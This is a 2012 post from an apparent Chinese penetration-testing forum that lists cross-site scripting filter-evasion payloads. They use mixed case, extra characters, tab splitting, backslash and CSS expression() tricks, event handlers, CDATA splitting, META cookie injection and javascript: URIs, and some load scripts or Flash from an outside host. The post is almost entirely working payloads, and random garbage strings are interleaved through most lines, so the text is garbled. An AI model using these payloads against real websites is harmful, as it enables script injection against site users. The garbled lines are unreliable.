中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]

作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写" \# o1 |5 ^9 p! |+ i' h3 s

8 X  e1 W* U# e3 m
3 {9 Q' b. ^& H1 g7 q0 n& p1 D. J3 A
    <sCript>alert(‘d’)</scRipT>
  e; P+ R9 c; s* ]! M; G9 k# A6 C$ p! \4 P! C3 u) ]
2. 利用多加一些其它字符来规避Regular Expression的检查" V% I8 E- _9 f

8 P- p2 e, w: L9 h3 f: K    <<script>alert(‘c’)//<</script>/ t; ?: M: r% D5 U, ?! q& g0 z

$ _: L8 w1 Y) E. |1 H8 b, w5 B    <SCRIPT a=">" SRC="t.js"></SCRIPT>  z" q# c0 m. ~9 `* h( m

3 @7 ?- N* E; E' M$ p) u6 ^    <SCRIPT =">" SRC="t.js"></SCRIPT>2 |$ `: q3 e0 E3 W) d: ^5 m- P
9 W, ?* `+ M+ X) d. `9 u
    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>3 C9 Y, ]; f4 J

5 s1 q* [3 v6 [! L/ b    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
3 j6 k: V9 X' H: c) f
' b# U6 s! h; Y' B# c    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
: G( n! O. I  q) U1 J( O( d6 g5 G. Z0 T0 @
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
/ d) w; `# {! h( F8 C
9 w) k/ ^, m2 N+ R+ P1 g3. 以其它扩展名取代.js' U3 }# f; H0 q/ V9 b# i
4 E% M! u  D% W+ H# G5 W) S& A
    <script src="bad.jpg"></script>, s" f( L2 E( {8 o( r

3 j& I6 b  \( V' \$ p, A4. 将Javascript写在CSS档里
+ }$ P( Z' ]7 O, z7 F% b4 y
# y; _9 T0 K6 n4 r  W8 f6 e    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">% q* e8 t+ i4 ^" N6 e! n
$ H& w. J1 }8 h5 z0 v
       example:
5 J+ {0 X. r- ^0 r0 z- S, W& _7 L, n
          body {" ?+ m/ Q3 ]% Q% _, N4 p

; Q, l0 n7 U5 s1 r- ]9 Z# N7 j               background-image: url(‘javascript:alert("XSS");’)
$ K- R- u1 g, i1 ~9 d1 D. n+ E: Z/ s: ?
0 s. m' |5 [! N# \  v$ L; ]* C          }% M& L- x, @6 y, C: {2 u; B/ L$ [
* D& w) @) s+ l9 b2 C
5. 在script的tag里加入一些其它字符
& V$ ^+ D- U: @6 k6 d1 k
* u. u/ m. D3 u; P! p  h. Y) [    <SCRIPT/SRC="t.js"></SCRIPT>' K8 A: O5 |+ P& t
- T7 T4 R% g& a( }
    <SCRIPT/anyword SRC="t.js"></SCRIPT>' R5 C- S; p% `5 j. Z! e2 e

, T1 R: \  b2 G6. 使用tab或是new line来规避
7 |7 p6 `" h2 _8 l6 K( k) `( [* N" i+ D- v0 A! j# L: p3 s  q
    <img src="jav ascr ipt:alert(‘XSS3′)">
) _' K4 K3 {2 L: n! |" R/ v- B) y" @- ]5 J0 @0 z( a
    <img src="jav ascr ipt:alert(‘XSS3′)">0 ?4 F. J7 ~9 _, ^! d
4 B' ?; b$ d/ a% Z2 m# Z8 c
    <IMG SRC="jav ascript:alert(‘XSS’);">
( @( k$ i. M$ A" K
8 I/ F& y% C$ _- O/ g         -> tag
; ]& }# @/ p% [9 U& {0 O; I2 Q) B8 e" ], ]1 t) I
         -> new line
* U8 o4 r2 n, K4 T# D, Y  ~) }
5 Z1 t5 @& s  C4 E7. 使用"\"来规避
' D" ^5 o3 \5 x# L( c: ^/ ?' t8 Z  t( y+ n% w
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>7 ~. S/ ]  l7 Y% V% I8 M: f

# P. O- J5 c' Q% C    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
4 w, }! Z, s0 K( `) @& \$ D
* @# M( d: J% w6 j. r% }    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
. s3 A7 Q" }8 x1 Y9 S, i: W/ Q9 e4 G  n
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
$ Z+ H9 T0 @$ {* @% H' I# e1 X! ^. j0 @# J5 Q
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
) X( x; c" ?  \' F) T: l4 O) t3 v8 N
8. 使用Hex encode来规避(也可能会把";"拿掉)
8 M" G+ F! w6 K& T' B- _+ s' Z% r/ [* m4 u) X7 g8 f
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: n# w" O+ k" X6 g# K# f- P: ?
* A' L8 t/ u( h! ~5 L( J7 M
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
4 P& ~0 K2 M2 V8 F, U, ~9 W' p+ G3 ~2 e  t; q
    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
. B# \% ]$ r0 S" P
6 h, ^$ {1 |5 s0 r; X9 H  @; u6 J        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">4 N, t0 i7 Q5 o, i' x% z

4 W3 N& o4 @5 I) B9. script in HTML tag7 L! D( Z: n1 W- w  I
8 Y1 B0 S( t2 J
    <body onload=」alert(‘onload’)」>% E1 k, p$ b6 p% d/ M

/ p" d, N; \$ m1 p9 _0 ]/ W        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
& O  g3 i7 y% W* V
6 f5 ]9 _' N! r( t& ~/ s& s/ m# p! b) A, J10. 在swf里含有xss的code
/ b8 ^6 j) s5 R7 W+ q
! [  P$ R. Z2 b% h( ^% G3 _& c    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>7 a( ]' h+ P* n+ Q6 f4 B4 d! \
5 U" W5 M" Z  c8 e6 J6 x, e
11. 利用CDATA将xss的code拆开,再组合起来。
* x+ a* C+ K3 I5 _5 a0 p" I3 Q* R
# P" I/ W3 Q5 R; [    <XML ID=I><X><C>& n4 c: {5 h% G+ n; W
4 g: {8 n$ y% S- \! k( l9 l
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
' b6 P' s  G4 G2 w& f, G9 o: Z& `$ U6 G2 [( w9 N* i3 f
    </C></X>2 g! b% C, X, M& h7 l! O
" }1 F  m  A0 I, _# J* @
    </xml>( a( G2 }/ k8 n5 W' T. \

6 D' h$ J% B6 F" J. r  [    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
6 R- z9 |3 X& v- o! a, Y5 H- N5 R9 a) j/ t, U9 B( Y
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>% w2 h+ ?+ U* q# Y* z

, b) i/ S; v7 v3 V3 f% R    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>6 S  J" ]  j. y$ ^4 ?$ B
# e0 `# H: y8 W/ {; r$ P
12. 利用HTML+TIME。3 d0 w4 L+ p. @: U# U4 d2 c
$ H% L" C, x$ A1 \3 @% O8 G
    <HTML><BODY>
0 M% u: Y. e5 M- f0 I
, {1 E: ^9 N. Z- i5 m6 f    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">, F; H6 k* o6 @. b" g

4 e  z/ I. @" u" n) ]( Z; d2 r    <?import namespace="t" implementation="#default#time2">
" D! d- s$ h/ B/ }% n9 f9 L  P' b0 d
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
/ l& g" |& D) @1 o' z' `4 @( f' E# C
. j$ c. ^2 w: o    </BODY></HTML>
1 g# |9 C6 Z  B2 n  A3 D
0 x8 D: m, i8 D7 r) \13. 透过META写入Cookie。
; {( @" y3 p2 e8 u: r+ n+ C' K- U( k: L7 q+ W& [9 m, ]) I& @5 y
    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
3 r5 [" F, F" I" X) k8 V& H
/ u1 w/ r* M0 ^' V, f8 b4 B14. javascript in src , href , url1 K1 ]+ p' T, x% _) s

' c! H, ]2 Y+ m4 ]6 c    <IFRAME SRC=javascript:alert(’13′)></IFRAME>
; O. l( r0 v$ S6 w/ U0 A# K, p+ i0 Y' a# s) |8 ^! F3 j& n
    <img src="javascript:alert(‘XSS3′)">
  M! P# ~& @) ^+ I' b: c/ ^( P2 D# |" v; V
<IMG DYNSRC="javascript:alert(‘XSS20′)">
! G0 K) m3 U6 o: z0 H
; h: r" i; b  W5 ?8 g# L  Q0 M    <IMG LOWSRC="javascript:alert(‘XSS21′)">0 A7 a/ H; W& K% ?

. [- N  B1 N' X! E0 f. O# F    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">( i* M& c) {+ n7 H& z* A+ ^$ J

2 Q4 W! F9 L3 Z3 S, D) X5 A* s. ?    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
% E, t6 ^* C+ W0 G
  `8 G/ o2 |- e' Q/ P    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">; X2 q# f1 C- T8 j3 r4 `
6 [2 }2 N1 u1 v) w$ [
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">: k( w6 X9 z  u# O2 d

  h/ y: J, o9 p$ ~( j    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}8 v3 g4 K. w. y, L
; z% N' J1 X, P2 v- N6 x: i
    </STYLE><A CLASS=XSS></A>% c1 d- z5 u  [9 c
/ U& D' |4 ?: \! ]* o1 Q. S
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>+ Q- K& f. G# S( M/ s# `

6 ~7 W5 }% T; ^9 T, l! X4 L& d




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2